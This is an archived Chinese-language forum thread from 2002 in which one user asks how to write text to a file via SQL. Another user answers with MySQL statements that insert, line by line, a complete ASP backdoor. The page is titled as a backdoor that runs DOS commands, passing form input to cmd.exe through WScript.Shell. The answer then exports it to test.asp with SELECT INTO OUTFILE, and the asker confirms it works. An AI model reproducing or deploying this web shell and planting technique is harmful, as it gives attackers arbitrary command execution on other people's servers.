sql语句（up有分.在线等待） (300分)

zhousi · 2002-12-10

to xianjun
表里就一个字段 str （text 或blob 型的）

xianjun · 2002-12-10

唉，小问题搞了半天，帮你试了一下，一切都没有问题啊：
use test;

create table a(str text);

insert into a(str) values('<% ');
insert into a(str) values('Dim oScript ');
insert into a(str) values('Dim oScriptNet ');
insert into a(str) values('Dim oFileSys, oFile ');
insert into a(str) values('Dim szCMD, szTempFile ');
insert into a(str) values('On Error Resume Next ');
insert into a(str) values('Set oScript = Server.CreateObject("WSCRIPT.SHELL") ');
insert into a(str) values('Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") ');
insert into a(str) values('Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") ');
insert into a(str) values('szCMD = Request.Form(".CMD") ');
insert into a(str) values('If (szCMD <>"") Then ');
insert into a(str) values(' szTempFile = "C:/" & oFileSys.GetTempName()');
insert into a(str) values(' Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) ');
insert into a(str) values(' Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ');
insert into a(str) values('End If ');
insert into a(str) values('%> ');
insert into a(str) values('<HTML>');
insert into a(str) values('<TITLE>可运行DOS命令的后门ASP</TITLE>');
insert into a(str) values('<BODY>');
insert into a(str) values('<FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> ');
insert into a(str) values('<input type=text name=".CMD" size=45 value="<%= szCMD %>">');
insert into a(str) values('<input type=submit value="输入DOS命令">');
insert into a(str) values('</FORM><PRE> ');
insert into a(str) values('<% ');
insert into a(str) values('If (IsObject(oFile)) Then ');
insert into a(str) values(' On Error Resume Next ');
insert into a(str) values(' Response.Write Server.HTMLEncode(oFile.ReadAll) ');
insert into a(str) values(' oFile.Close ');
insert into a(str) values(' Call oFileSys.DeleteFile(szTempFile, True) ');
insert into a(str) values('End If');
insert into a(str) values('%> ');
insert into a(str) values('</BODY>');
insert into a(str) values('</HTML> ');

select * from a into outfile "f://test.asp";

http://localhost/test.asp
顺利成功。

zhousi · 2002-12-10

to xianjun
谢谢，按照你的方法已经成功
总结一下，由于思路不好，呵呵，把所有字符串放到一行里了，所以结果，。。
xianjun把每行分别放在数据库的每一行里在outfile，不错，就搞定了

zhousi · 2002-12-10

谢谢各位

sql语句（up有分.在线等待） (300分)

myjane

Unregistered / Unconfirmed

qianwt

Unregistered / Unconfirmed

zhousi

Unregistered / Unconfirmed

xianjun

Unregistered / Unconfirmed

zhousi

Unregistered / Unconfirmed

zhousi

Unregistered / Unconfirmed

Similar threads